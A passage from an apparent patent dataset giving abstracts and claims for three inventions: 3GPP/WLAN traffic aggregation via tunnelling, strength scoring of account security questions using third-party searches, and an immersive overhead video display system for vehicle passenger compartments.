A communication node arranged to provide traffic aggregation of a 3GPP network and a WLAN network when a wireless device is connected to an access point of the WLAN network, the communication node comprising a processor (P) and a memory (M), said memory comprising instructions executable by said processor whereby the communication node is configured to:
establish an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently, and communicate data and/or messages across the aggregation interface. 13. A communication node according to claim 12, wherein the communication node is configured to implement the aggregation interface as a tunnel in which aggregation frames are encapsulated. 14. A communication node according to claim 13, wherein the aggregation frames comprise any of: MAC frames, RLC frames and PDCP frames. 15. A communication node according to claim 13, wherein the tunnel is a Layer 2 over Layer 3 tunnel where Layer 2 frames are encapsulated in Layer 3 frames. 16. A communication node according to claim 13, wherein the communication node is configured to implement the tunnel as any of:
GTP, GPRS Tunnelling Protocol, IPSec, Internet Protocol Security, GRE, Generic Routing Encapsulation, L2TP, Layer 2 Tunnelling Protocol, L2TPv3, Layer 2 Tunnelling Protocol Version 3, and L2F, Layer 2 Forwarding Protocol. 17. A communication node according to claim 12, wherein said traffic aggregation comprises simultaneous use of 3GPP and WLAN links for transmission of packets belonging to an IP traffic flow. 18. A communication node according to claim 12, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by using an existing secure tunnel on an SWu interface between the wireless device and the ePDG. 19. A communication node according to claim 12, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by setting up a new secure tunnel for the aggregation traffic between the wireless device and the ePDG. 20. A communication node according to claim 12, wherein the communication node is the wireless device, and wherein the wireless device is configured to receive address information signalled from the base station and to use the received address information for establishing the aggregation interface. 21. A communication node according to claim 12, wherein the communication node is the base station, and wherein the base station is configured to receive address information signalled from the wireless device and to use the received address information for establishing the aggregation interface. 22. A communication node according to claim 20, wherein said address information has a format which complies with a tunnelling protocol used on the aggregation interface. 23. (canceled) 24. 
A communication node arranged to provide traffic aggregation of a 3GPP network and a WLAN network when a wireless device is connected to an access point of the WLAN network, wherein the communication node comprises:
an establishing module configured to establish an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently, and a communicating module configured to communicate data and/or messages across the aggregation interface. 25. A communication node according to claim 24, wherein the communication node is configured to implement the aggregation interface as a tunnel in which aggregation frames are encapsulated. 26. A communication node according to claim 25, wherein the aggregation frames comprise any of: MAC frames, RLC frames and PDCP frames. 27. A communication node according to claim 24, wherein the tunnel is a Layer 2 over Layer 3 tunnel where Layer 2 frames are encapsulated in Layer 3 frames. 28. A communication node according to claim 25, wherein the communication node is configured to implement the tunnel as any of:
GTP, GPRS Tunnelling Protocol, IPSec, Internet Protocol Security, GRE, Generic Routing Encapsulation, L2TP, Layer 2 Tunnelling Protocol, L2TPv3, Layer 2 Tunnelling Protocol Version 3, and L2F, Layer 2 Forwarding Protocol. 29. A communication node according to claim 24, wherein said traffic aggregation comprises simultaneous use of 3GPP and WLAN links for transmission of packets belonging to an IP traffic flow. 30. A communication node according to claim 24, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by using an existing secure tunnel on an SWu interface between the wireless device and the ePDG. 31. A communication node according to claim 24, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by setting up a new secure tunnel for the aggregation traffic between the wireless device and the ePDG. 32. A communication node according to claim 24, wherein the communication node is the wireless device, and wherein the wireless device is configured to receive address information signalled from the base station and to use the received address information for establishing the aggregation interface. 33. A communication node according to claim 24, wherein the communication node is the base station, and wherein the base station is configured to receive address information signalled from the wireless device and to use the received address information for establishing the aggregation interface. 34. A communication node according to claim 32, wherein said address information has a format which complies with a tunnelling protocol used on the aggregation interface. 
| A method and communication node for providing traffic aggregation between a 3GPP network and a WLAN network when a wireless device is connected to an access point of the WLAN network. The communication node establishes an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently. The communication node can then communicate data and/or messages over the WLAN network across the aggregation interface, without requiring any modifications or adaptations in the WLAN network. The communication node may be the wireless device or the base station. 1. A method performed by a communication node for providing traffic aggregation of a 3GPP network and a WLAN network when a wireless device is connected to the WLAN network, the method comprising:
establishing an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently, and communicating data and/or messages across the aggregation interface. 2. A method according to claim 1, wherein the aggregation interface is implemented as a tunnel in which aggregation frames are encapsulated. 3. A method according to claim 2, wherein the aggregation frames comprise any of: Medium Access Control, MAC, frames, Radio Link Control, RLC, frames and Packet Data Convergence Protocol, PDCP, frames. 4. A method according to claim 2, wherein the tunnel is a Layer 2 over Layer 3 tunnel where Layer 2 frames are encapsulated in Layer 3 frames. 5. A method according to claim 2, wherein the tunnel is implemented as any of:
GTP, GPRS Tunnelling Protocol, IPSec, Internet Protocol Security, GRE, Generic Routing Encapsulation, L2TP, Layer 2 Tunnelling Protocol, L2TPv3, Layer 2 Tunnelling Protocol Version 3, and L2F, Layer 2 Forwarding Protocol. 6. A method according to claim 1, wherein said traffic aggregation comprises simultaneous use of 3GPP and WLAN links for transmission of packets belonging to an IP traffic flow. 7. A method according to claim 1, wherein the communicated data and/or messages are forwarded over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by using an existing secure tunnel on an SWu interface between the wireless device and the ePDG. 8. A method according to claim 1, wherein the communicated data and/or messages are forwarded over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by setting up a new secure tunnel for the aggregation traffic between the wireless device and the ePDG. 9. A method according to claim 1, wherein the communication node is the wireless device, and wherein the wireless device receives address information signalled from the base station and uses the received address information for establishing the aggregation interface. 10. A method according to claim 1, wherein the communication node is the base station, and wherein the base station receives address information signalled from the wireless device and uses the received address information for establishing the aggregation interface. 11. A method according to claim 9, wherein said address information has a format which complies with a tunnelling protocol used on the aggregation interface. 12. 
A communication node arranged to provide traffic aggregation of a 3GPP network and a WLAN network when a wireless device is connected to an access point of the WLAN network, the communication node comprising a processor (P) and a memory (M), said memory comprising instructions executable by said processor whereby the communication node is configured to:
establish an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently, and communicate data and/or messages across the aggregation interface. 13. A communication node according to claim 12, wherein the communication node is configured to implement the aggregation interface as a tunnel in which aggregation frames are encapsulated. 14. A communication node according to claim 13, wherein the aggregation frames comprise any of: MAC frames, RLC frames and PDCP frames. 15. A communication node according to claim 13, wherein the tunnel is a Layer 2 over Layer 3 tunnel where Layer 2 frames are encapsulated in Layer 3 frames. 16. A communication node according to claim 13, wherein the communication node is configured to implement the tunnel as any of:
GTP, GPRS Tunnelling Protocol, IPSec, Internet Protocol Security, GRE, Generic Routing Encapsulation, L2TP, Layer 2 Tunnelling Protocol, L2TPv3, Layer 2 Tunnelling Protocol Version 3, and L2F, Layer 2 Forwarding Protocol. 17. A communication node according to claim 12, wherein said traffic aggregation comprises simultaneous use of 3GPP and WLAN links for transmission of packets belonging to an IP traffic flow. 18. A communication node according to claim 12, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by using an existing secure tunnel on an SWu interface between the wireless device and the ePDG. 19. A communication node according to claim 12, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by setting up a new secure tunnel for the aggregation traffic between the wireless device and the ePDG. 20. A communication node according to claim 12, wherein the communication node is the wireless device, and wherein the wireless device is configured to receive address information signalled from the base station and to use the received address information for establishing the aggregation interface. 21. A communication node according to claim 12, wherein the communication node is the base station, and wherein the base station is configured to receive address information signalled from the wireless device and to use the received address information for establishing the aggregation interface. 22. A communication node according to claim 20, wherein said address information has a format which complies with a tunnelling protocol used on the aggregation interface. 23. (canceled) 24. 
A communication node arranged to provide traffic aggregation of a 3GPP network and a WLAN network when a wireless device is connected to an access point of the WLAN network, wherein the communication node comprises:
an establishing module configured to establish an aggregation interface between the wireless device and a base station of the 3GPP network for carrying aggregation traffic traversing the WLAN network transparently, and a communicating module configured to communicate data and/or messages across the aggregation interface. 25. A communication node according to claim 24, wherein the communication node is configured to implement the aggregation interface as a tunnel in which aggregation frames are encapsulated. 26. A communication node according to claim 25, wherein the aggregation frames comprise any of: MAC frames, RLC frames and PDCP frames. 27. A communication node according to claim 24, wherein the tunnel is a Layer 2 over Layer 3 tunnel where Layer 2 frames are encapsulated in Layer 3 frames. 28. A communication node according to claim 25, wherein the communication node is configured to implement the tunnel as any of:
GTP, GPRS Tunnelling Protocol, IPSec, Internet Protocol Security, GRE, Generic Routing Encapsulation, L2TP, Layer 2 Tunnelling Protocol, L2TPv3, Layer 2 Tunnelling Protocol Version 3, and L2F, Layer 2 Forwarding Protocol. 29. A communication node according to claim 24, wherein said traffic aggregation comprises simultaneous use of 3GPP and WLAN links for transmission of packets belonging to an IP traffic flow. 30. A communication node according to claim 24, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by using an existing secure tunnel on an SWu interface between the wireless device and the ePDG. 31. A communication node according to claim 24, wherein the communication node is configured to forward the communicated data and/or messages over an evolved Packet Data Gateway, ePDG, for security control of data packets in the 3GPP network by setting up a new secure tunnel for the aggregation traffic between the wireless device and the ePDG. 32. A communication node according to claim 24, wherein the communication node is the wireless device, and wherein the wireless device is configured to receive address information signalled from the base station and to use the received address information for establishing the aggregation interface. 33. A communication node according to claim 24, wherein the communication node is the base station, and wherein the base station is configured to receive address information signalled from the wireless device and to use the received address information for establishing the aggregation interface. 34. A communication node according to claim 32, wherein said address information has a format which complies with a tunnelling protocol used on the aggregation interface. | 2,400 |
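The Layer 2 over Layer 3 tunnelling recited in claims 4-5 of this row (a Layer 2 aggregation frame, e.g. a MAC/RLC/PDCP frame, encapsulated in Layer 3 packets via a protocol such as GRE) can be sketched roughly as below. This is a toy illustration, not a conformant GRE or 3GPP implementation; the 0x0001 protocol type and the function names are assumptions.

```python
import struct

# 4-byte GRE-style header: flags/version field, then a protocol type
# identifying what the encapsulated payload is.
GRE_HDR = struct.Struct("!HH")
AGG_PROTO = 0x0001  # hypothetical "aggregation frame" protocol type

def encapsulate_l2(frame: bytes) -> bytes:
    """Wrap a Layer 2 aggregation frame for transport over the Layer 3 tunnel."""
    return GRE_HDR.pack(0, AGG_PROTO) + frame

def decapsulate_l2(packet: bytes) -> bytes:
    """Recover the Layer 2 frame at the far end of the tunnel."""
    flags_ver, proto = GRE_HDR.unpack_from(packet)
    if proto != AGG_PROTO:
        raise ValueError("not an aggregation frame")
    return packet[GRE_HDR.size:]
```

Because the WLAN only ever sees ordinary Layer 3 packets, the aggregation traffic traverses it transparently, which is the point of the claims: no modification of the WLAN network is needed.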
9,163 | 9,163 | 15,133,655 | 2,432 | A device, system, and method validates strength values for security questions associated with an online account. The method performed by an online service server includes receiving a security question data from a user device, the security question data being utilized for a user authentication to access an account of a user. The method includes performing a search, using third party sources, to generate search result data, the search result data being indicative of an availability value of responses to the security question data. The method includes determining a strength value of the security question data based on the search result data. | 1. A method, comprising:
receiving, by an online service server, a security question data from a user device, the security question data being utilized for a user authentication to access an account of a user; performing, by the online service server, a search, using third party sources, to generate search result data, the search result data being indicative of an availability value of responses to the security question data; and determining, by the online service server, a strength value of the security question data based on the search result data. 2. The method of claim 1, further comprising:
receiving, by the online service server, an answer data from the user device, the answer data corresponding to the security question data and being utilized for the user authentication; performing, by the online service server, a further search, using the third party sources, to generate further search result data, the further search result data being indicative of a further availability value of further responses to the security question data with the answer data; and determining, by the online service server, a further strength value of the security question data with the answer data based on the further search result data. 3. The method of claim 1, wherein the security question data is selected by the user from a plurality of predetermined security question data. 4. The method of claim 1, further comprising:
receiving, by the online service server, an access grant from the user; and accessing, by the online service server, the third party sources using the access grant. 5. The method of claim 1, further comprising:
transmitting, by the online service server, an indicator to the user device representing the strength value of the security question data. 6. The method of claim 2, further comprising:
transmitting, by the online service server, an indicator to the user device representing the further strength value of the security question data with the answer data. 7. The method of claim 1, further comprising:
comparing, by the online service server, the strength value of the security question data to a predetermined threshold value of a minimum security level; when the strength value is greater than the predetermined threshold value, associating, by the online service server, the security question data with the account; and when the strength value is lower than the predetermined threshold value, requesting, by the online service server, an update to the security question data from the user. 8. The method of claim 1, wherein the performing is performed at a subsequent time, the subsequent time being one of at a predetermined time interval, at a dynamic time interval, and upon detecting an event, and wherein the determining is performed at the subsequent time to determine a subsequent strength value. 9. The method of claim 8, further comprising:
comparing, by the online service server, the subsequent strength value to a predetermined threshold value of a minimum security level; and when the subsequent strength value is lower than the predetermined threshold value, requesting, by the online service server, an update to the security question data. 10. The method of claim 8, further comprising:
comparing, by the online service server, the subsequent strength value to the strength value; and when the subsequent strength value has decreased from the strength value by a predetermined difference value, requesting, by the online service server, an update to the security question data. 11. An online service server, comprising:
a transceiver communicating with a communications network to communicate with a user device utilized by a user, the transceiver receiving a security question data from the user device, the security question data being utilized for a user authentication to access an account of a user; a processor coupled to the transceiver; and a memory arrangement with an executable program stored thereon, the program instructing the processor to perform operations comprising:
performing a search, using third party sources, to generate search result data, the search result data being indicative of an availability value of responses to the security question data; and
determining a strength value of the security question data based on the search result data. 12. The online service server of claim 11, wherein the transceiver further:
receives an answer data from the user device, the answer data corresponding to the security question data and being utilized for the user authentication, and wherein the program instructing the processor to perform operations further comprising: performing a further search, using the third party sources, to generate further search result data, the further search result data being indicative of a further availability value of further responses to the security question data with the answer data; and determining a further strength value of the security question data with the answer data based on the further search result data. 13. The online service server of claim 11, wherein the transceiver further transmits a plurality of predetermined security question data and receives a selection from the user device of the security question data. 14. The online service server of claim 11, wherein the transceiver further receives an access grant from the user, the access grant being used to access the third party sources. 15. The online service server of claim 11, wherein the transceiver further transmits an indicator to the user device representing the strength value of the security question data. 16. The online service server of claim 11, wherein the program instructing the processor to perform operations further comprising:
comparing the strength value of the security question data to a predetermined threshold value of a minimum security level; when the strength value is greater than the predetermined threshold value, associating the security question data with the account; and when the strength value is lower than the predetermined threshold value, requesting an update to the security question data from the user. 17. The online service server of claim 11, wherein the processor performs the search at a subsequent time. 18. The online service server of claim 17, wherein the subsequent time is one of at a predetermined time interval, at a dynamic time interval, and upon detecting an event. 19. The online service server of claim 11, wherein the online service server is associated with a contact center that manages the account. 20. A method, comprising:
receiving, by an online service server, an access request to access an account of a user from a user device, the account associated with a user account profile data including a security question data, an answer data corresponding to the security question data, and a strength value corresponding to the security question data, the strength value based on search result data of a search using third party sources, the strength value being indicative of an availability value of responses to the security question data; determining, by the online service server, a timer value based on the strength value; transmitting, by the online service server, an answer request to the user device requesting the answer data to be provided for the security question data; and granting, by the online service server, access to the account by the user device when the answer data is received within the timer value. | A device, system, and method validates strength values for security questions associated with an online account. The method performed by an online service server includes receiving a security question data from a user device, the security question data being utilized for a user authentication to access an account of a user. The method includes performing a search, using third party sources, to generate search result data, the search result data being indicative of an availability value of responses to the security question data. The method includes determining a strength value of the security question data based on the search result data. 1. A method, comprising:
receiving, by an online service server, a security question data from a user device, the security question data being utilized for a user authentication to access an account of a user; performing, by the online service server, a search, using third party sources, to generate search result data, the search result data being indicative of an availability value of responses to the security question data; and determining, by the online service server, a strength value of the security question data based on the search result data. 2. The method of claim 1, further comprising:
receiving, by the online service server, an answer data from the user device, the answer data corresponding to the security question data and being utilized for the user authentication; performing, by the online service server, a further search, using the third party sources, to generate further search result data, the further search result data being indicative of a further availability value of further responses to the security question data with the answer data; and determining, by the online service server, a further strength value of the security question data with the answer data based on the further search result data. 3. The method of claim 1, wherein the security question data is selected by the user from a plurality of predetermined security question data. 4. The method of claim 1, further comprising:
receiving, by the online service server, an access grant from the user; and accessing, by the online service server, the third party sources using the access grant. 5. The method of claim 1, further comprising:
transmitting, by the online service server, an indicator to the user device representing the strength value of the security question data. 6. The method of claim 2, further comprising:
transmitting, by the online service server, an indicator to the user device representing the further strength value of the security question data with the answer data. 7. The method of claim 1, further comprising:
comparing, by the online service server, the strength value of the security question data to a predetermined threshold value of a minimum security level; when the strength value is greater than the predetermined threshold value, associating, by the online service server, the security question data with the account; and when the strength value is lower than the predetermined threshold value, requesting, by the online service server, an update to the security question data from the user. 8. The method of claim 1, wherein the performing is performed at a subsequent time, the subsequent time being one of at a predetermined time interval, at a dynamic time interval, and upon detecting an event, and wherein the determining is performed at the subsequent time to determine a subsequent strength value. 9. The method of claim 8, further comprising:
comparing, by the online service server, the subsequent strength value to a predetermined threshold value of a minimum security level; and when the subsequent strength value is lower than the predetermined threshold value, requesting, by the online service server, an update to the security question data. 10. The method of claim 8, further comprising:
comparing, by the online service server, the subsequent strength value to the strength value; and when the subsequent strength value has decreased from the strength value by a predetermined difference value, requesting, by the online service server, an update to the security question data. 11. An online service server, comprising:
a transceiver communicating with a communications network to communicate with a user device utilized by a user, the transceiver receiving a security question data from the user device, the security question data being utilized for a user authentication to access an account of a user; a processor coupled to the transceiver; and a memory arrangement with an executable program stored thereon, the program instructing the processor to perform operations comprising:
performing a search, using third party sources, to generate search result data, the search result data being indicative of an availability value of responses to the security question data; and
determining a strength value of the security question data based on the search result data. 12. The online service server of claim 11, wherein the transceiver further:
receives an answer data from the user device, the answer data corresponding to the security question data and being utilized for the user authentication, and wherein the program instructing the processor to perform operations further comprising: performing a further search, using the third party sources, to generate further search result data, the further search result data being indicative of a further availability value of further responses to the security question data with the answer data; and determining a further strength value of the security question data with the answer data based on the further search result data. 13. The online service server of claim 11, wherein the transceiver further transmits a plurality of predetermined security question data and receives a selection from the user device of the security question data. 14. The online service server of claim 11, wherein the transceiver further receives an access grant from the user, the access grant being used to access the third party sources. 15. The online service server of claim 11, wherein the transceiver further transmits an indicator to the user device representing the strength value of the security question data. 16. The online service server of claim 11, wherein the program instructing the processor to perform operations further comprising:
comparing the strength value of the security question data to a predetermined threshold value of a minimum security level; when the strength value is greater than the predetermined threshold value, associating the security question data with the account; and when the strength value is lower than the predetermined threshold value, requesting an update to the security question data from the user. 17. The online service server of claim 11, wherein the processor performs the search at a subsequent time. 18. The online service server of claim 17, wherein the subsequent time is one of at a predetermined time interval, at a dynamic time interval, and upon detecting an event. 19. The online service server of claim 11, wherein the online service server is associated with a contact center that manages the account. 20. A method, comprising:
receiving, by an online service server, an access request to access an account of a user from a user device, the account associated with a user account profile data including a security question data, an answer data corresponding to the security question data, and a strength value corresponding to the security question data, the strength value based on search result data of a search using third party sources, the strength value being indicative of an availability value of responses to the security question data; determining, by the online service server, a timer value based on the strength value; transmitting, by the online service server, an answer request to the user device requesting the answer data to be provided for the security question data; and granting, by the online service server, access to the account by the user device when the answer data is received within the timer value. | 2,400 |
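The strength-scoring and timer scheme recited in claims 1, 7, and 20 of this application can be sketched in Python. Everything here is illustrative: the function names, the toy source corpus, the scoring formula, the threshold, and the timer mapping are assumptions, not the patent's implementation.

```python
# Hypothetical sketch of the claimed flow: score a security question by how
# findable its answers are in third-party sources, gate it on a threshold,
# and derive a response timer from the resulting strength value.

def availability(question: str, sources: list[list[str]]) -> float:
    """Fraction of third-party sources whose text mentions the question topic.

    Stand-in for the patent's 'search result data'; a real system would query
    external services rather than scan local word lists.
    """
    topic = question.lower().split()
    hits = sum(any(w in doc for doc in src for w in topic) for src in sources)
    return hits / len(sources) if sources else 0.0

def strength_value(question: str, sources: list[list[str]]) -> float:
    # Higher availability of answers implies a weaker question (claim 1).
    return 1.0 - availability(question, sources)

def timer_seconds(strength: float, base: float = 30.0) -> float:
    # Claim 20 derives the answer window from the strength value.
    # Assumption: weaker questions get a shorter window.
    return base * strength + 10.0

THRESHOLD = 0.5  # claim 7's 'predetermined threshold value' (assumed)

sources = [["mother", "maiden", "name", "smith"], ["favorite", "color"]]
question = "first pet species"
s = strength_value(question, sources)
if s > THRESHOLD:
    print(f"accept question, timer {timer_seconds(s):.0f}s")
else:
    print("request an updated security question")
```

The re-validation in claims 8-10 would simply rerun `strength_value` at a later time and compare the new score against the threshold or the stored score.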
9,164 | 9,164 | 15,917,477 | 2,425 | A passenger compartment of a vehicle includes an overhead video display mounted horizontally proximate the vehicle roof, and at least one vertical video display mounted proximate the forward or rearward edge of the overhead video display. A computer mounted within the vehicle is coupled to the overhead and vertical video displays for sending coordinated video images thereto, whereby video images appear to travel continuously between the overhead and vertical video displays. A control panel provided in the passenger compartment communicates with the computer for selecting video images to be displayed. A second vertical video display is preferably provided opposite the first vertical video display at the opposing end of the passenger compartment. Additional overhead displays may be added to expand the size of the image displayed overhead. An air cooling duct is formed above the overhead display for passage of cooled air. | 1. A passenger vehicle including a full-immersion video display system, comprising in combination:
a) a vehicle having opposing front and rear ends, opposing first and second side walls, and a roof; b) the vehicle including a driver compartment located near the front end of the vehicle, and a passenger compartment located between the driver compartment and the rear end of the vehicle, the passenger compartment having forward and rearward ends and including at least a first passenger seat adapted to seat a first passenger facing toward the rear end of the vehicle; c) a first overhead video display screen mounted within the passenger compartment in a generally horizontal plane proximate to the roof and within an upper portion of the passenger compartment; d) a first vertical video display screen mounted within the passenger compartment in a generally vertical plane proximate to the rearward end of the passenger compartment; e) a computer mounted within the vehicle and coupled to the first overhead video display screen and to the first vertical video display screen for sending coordinated video images to be displayed within the passenger compartment, and not within the driver compartment, upon the first overhead video display screen and the first vertical video display screen to display images that appear to travel between the horizontal plane of the first overhead video display screen and the vertical plane of the first vertical video display screen. 2. The passenger vehicle recited in claim 1 further including a control panel within the passenger compartment and having a touch-sensitive screen, the control panel being in communication with the computer for selecting video images to be displayed upon the first overhead video display screen and the first vertical video display screen. 3. The passenger vehicle recited in claim 1 wherein a second vertical video display screen is mounted proximate to the forward end of the passenger compartment. 4. (canceled) 5. The passenger vehicle recited in claim 1 wherein:
a) the passenger compartment includes at least a second passenger seat facing toward the front end of the vehicle; and
b) a second vertical video display screen is mounted in a generally vertical plane proximate to the forward end of the passenger compartment, the second vertical video display screen also being coupled to the computer, and the computer sending coordinated video images to be displayed upon the first overhead display screen, and upon the first and second vertical video display screens, to display images that appear to travel between the horizontal plane of the overhead video display screen and the vertical planes of the first and second vertical video display screens. 6. The passenger vehicle recited in claim 1 further including a second overhead video display screen mounted in a generally horizontal plane proximate to the roof and within the upper portion of the passenger compartment, the first and second overhead video display screens each having forward and rearward edges, the rearward edge of the first overhead video display screen lying substantially adjacent the forward edge of the second overhead video display screen to form a substantially continuous composite horizontal display panel, the second overhead video display screen being coupled to the computer, and the computer sending coordinated video images to be displayed upon the first and second overhead video display screens, and upon the first vertical video display screen to display images that appear to travel between the composite horizontal display panel and the vertical plane of the first vertical video display screen. 7. The passenger vehicle recited in claim 6 wherein:
a) the passenger compartment includes at least a second passenger seat facing toward the front end of the vehicle; and
b) a second vertical video display screen is mounted in a generally vertical plane proximate to the forward end of the passenger compartment, the second vertical video display screen also being coupled to the computer, and the computer sending coordinated video images to be displayed upon the composite horizontal display panel, and upon the first and second vertical video display screens, to display images that appear to travel between the horizontal plane of the composite horizontal display panel and the vertical planes of the first and second vertical video display screens. 8. A passenger vehicle including a full-immersion video display system, comprising in combination:
a) a vehicle having opposing front and rear ends, opposing first and second side walls, and a roof; b) the vehicle including a passenger compartment having forward and rearward ends and including at least a first passenger seat; c) a horizontal support frame secured in fixed relationship within the vehicle below the vehicle roof; d) a first overhead video display screen mounted in a generally horizontal plane proximate to the roof and within an upper portion of the passenger compartment, and wherein the first overhead video display screen is mounted within the horizontal support frame in a fixed horizontal position; e) a first vertical video display screen mounted in a generally vertical plane proximate to one of the forward and rearward ends of the passenger compartment; and f) a computer mounted within the vehicle and coupled to the first overhead video display screen and to the first vertical video display screen for sending coordinated video images to be displayed upon the first overhead video display screen and the first vertical video display screen to display images that appear to travel between the horizontal plane of the first overhead video display screen and the vertical plane of the first vertical video display screen. 9. The passenger vehicle recited in claim 8 including a second overhead video display screen mounted in a generally horizontal plane proximate to the roof and within the upper portion of the passenger compartment, the first and second overhead video display screens each having forward and rearward edges, the rearward edge of the first overhead video display screen lying substantially adjacent the forward edge of the second overhead video display screen to form a substantially continuous composite horizontal display panel, and wherein the second overhead video display screen is mounted within the horizontal support frame. 10. 
The passenger vehicle recited in claim 8 wherein the horizontal support frame is spaced apart from the vehicle roof to create an air duct between the vehicle roof and the first overhead video display screen, and wherein the vehicle further includes at least one air blower for blowing cooled air through the air duct to avoid overheating the first overhead video display screen. 11. The passenger vehicle recited in claim 8 including a layer of cushioning material interposed between the first overhead video display screen and the horizontal support frame to cushion the first overhead display panel from shock and vibration as the vehicle moves. 12. A passenger vehicle including a full-immersion video display system, comprising in combination:
a) a vehicle having opposing front and rear ends, opposing first and second side walls, and a roof; b) the vehicle including a passenger compartment having forward and rearward ends and including at least a first passenger seat; c) a first overhead video display screen mounted in a generally horizontal plane proximate to the roof and within an upper portion of the passenger compartment; d) a first vertical video display screen mounted in a generally vertical plane proximate to one of the forward and rearward ends of the passenger compartment; e) a computer mounted within the vehicle and coupled to the first overhead video display screen and to the first vertical video display screen for sending coordinated video images to be displayed upon the first overhead video display screen and the first vertical video display screen to display images that appear to travel between the horizontal plane of the first overhead video display screen and the vertical plane of the first vertical video display screen; f) at least one electrical storage battery storing low-voltage D.C. electrical power; g) a sine wave power inverter coupled to the at least one electrical storage battery storing low-voltage D.C. electrical power for producing a higher voltage A.C. electrical supply; h) wherein the higher voltage A.C. electrical supply is coupled to the first overhead video display screen and to the computer for supplying electrical power thereto; and i) an audio sound system for producing audio signals within the passenger compartment synchronized with the displayed video images, the audio sound system being coupled to the at least one electrical storage battery for receiving the low-voltage D.C. electrical power to avoid introduction of low frequency A.C. “hum” into the audio sound system. 13. 
(canceled) | A passenger compartment of a vehicle includes an overhead video display mounted horizontally proximate the vehicle roof, and at least one vertical video display mounted proximate the forward or rearward edge of the overhead video display. A computer mounted within the vehicle is coupled to the overhead and vertical video displays for sending coordinated video images thereto, whereby video images appear to travel continuously between the overhead and vertical video displays. A control panel provided in the passenger compartment communicates with the computer for selecting video images to be displayed. A second vertical video display is preferably provided opposite the first vertical video display at the opposing end of the passenger compartment. Additional overhead displays may be added to expand the size of the image displayed overhead. An air cooling duct is formed above the overhead display for passage of cooled air. 1. A passenger vehicle including a full-immersion video display system, comprising in combination:
a) a vehicle having opposing front and rear ends, opposing first and second side walls, and a roof; b) the vehicle including a driver compartment located near the front end of the vehicle, and a passenger compartment located between the driver compartment and the rear end of the vehicle, the passenger compartment having forward and rearward ends and including at least a first passenger seat adapted to seat a first passenger facing toward the rear end of the vehicle; c) a first overhead video display screen mounted within the passenger compartment in a generally horizontal plane proximate to the roof and within an upper portion of the passenger compartment; d) a first vertical video display screen mounted within the passenger compartment in a generally vertical plane proximate to the rearward end of the passenger compartment; e) a computer mounted within the vehicle and coupled to the first overhead video display screen and to the first vertical video display screen for sending coordinated video images to be displayed within the passenger compartment, and not within the driver compartment, upon the first overhead video display screen and the first vertical video display screen to display images that appear to travel between the horizontal plane of the first overhead video display screen and the vertical plane of the first vertical video display screen. 2. The passenger vehicle recited in claim 1 further including a control panel within the passenger compartment and having a touch-sensitive screen, the control panel being in communication with the computer for selecting video images to be displayed upon the first overhead video display screen and the first vertical video display screen. 3. The passenger vehicle recited in claim 1 wherein a second vertical video display screen is mounted proximate to the forward end of the passenger compartment. 4. (canceled) 5. The passenger vehicle recited in claim 1 wherein:
a) the passenger compartment includes at least a second passenger seat facing toward the front end of the vehicle; and
b) a second vertical video display screen is mounted in a generally vertical plane proximate to the forward end of the passenger compartment, the second vertical video display screen also being coupled to the computer, and the computer sending coordinated video images to be displayed upon the first overhead display screen, and upon the first and second vertical video display screens, to display images that appear to travel between the horizontal plane of the overhead video display screen and the vertical planes of the first and second vertical video display screens. 6. The passenger vehicle recited in claim 1 further including a second overhead video display screen mounted in a generally horizontal plane proximate to the roof and within the upper portion of the passenger compartment, the first and second overhead video display screens each having forward and rearward edges, the rearward edge of the first overhead video display screen lying substantially adjacent the forward edge of the second overhead video display screen to form a substantially continuous composite horizontal display panel, the second overhead video display screen being coupled to the computer, and the computer sending coordinated video images to be displayed upon the first and second overhead video display screens, and upon the first vertical video display screen to display images that appear to travel between the composite horizontal display panel and the vertical plane of the first vertical video display screen. 7. The passenger vehicle recited in claim 6 wherein:
a) the passenger compartment includes at least a second passenger seat facing toward the front end of the vehicle; and
b) a second vertical video display screen is mounted in a generally vertical plane proximate to the forward end of the passenger compartment, the second vertical video display screen also being coupled to the computer, and the computer sending coordinated video images to be displayed upon the composite horizontal display panel, and upon the first and second vertical video display screens, to display images that appear to travel between the horizontal plane of the composite horizontal display panel and the vertical planes of the first and second vertical video display screens. 8. A passenger vehicle including a full-immersion video display system, comprising in combination:
a) a vehicle having opposing front and rear ends, opposing first and second side walls, and a roof; b) the vehicle including a passenger compartment having forward and rearward ends and including at least a first passenger seat; c) a horizontal support frame secured in fixed relationship within the vehicle below the vehicle roof; d) a first overhead video display screen mounted in a generally horizontal plane proximate to the roof and within an upper portion of the passenger compartment, and wherein the first overhead video display screen is mounted within the horizontal support frame in a fixed horizontal position; e) a first vertical video display screen mounted in a generally vertical plane proximate to one of the forward and rearward ends of the passenger compartment; and f) a computer mounted within the vehicle and coupled to the first overhead video display screen and to the first vertical video display screen for sending coordinated video images to be displayed upon the first overhead video display screen and the first vertical video display screen to display images that appear to travel between the horizontal plane of the first overhead video display screen and the vertical plane of the first vertical video display screen. 9. The passenger vehicle recited in claim 8 including a second overhead video display screen mounted in a generally horizontal plane proximate to the roof and within the upper portion of the passenger compartment, the first and second overhead video display screens each having forward and rearward edges, the rearward edge of the first overhead video display screen lying substantially adjacent the forward edge of the second overhead video display screen to form a substantially continuous composite horizontal display panel, and wherein the second overhead video display screen is mounted within the horizontal support frame. 10. 
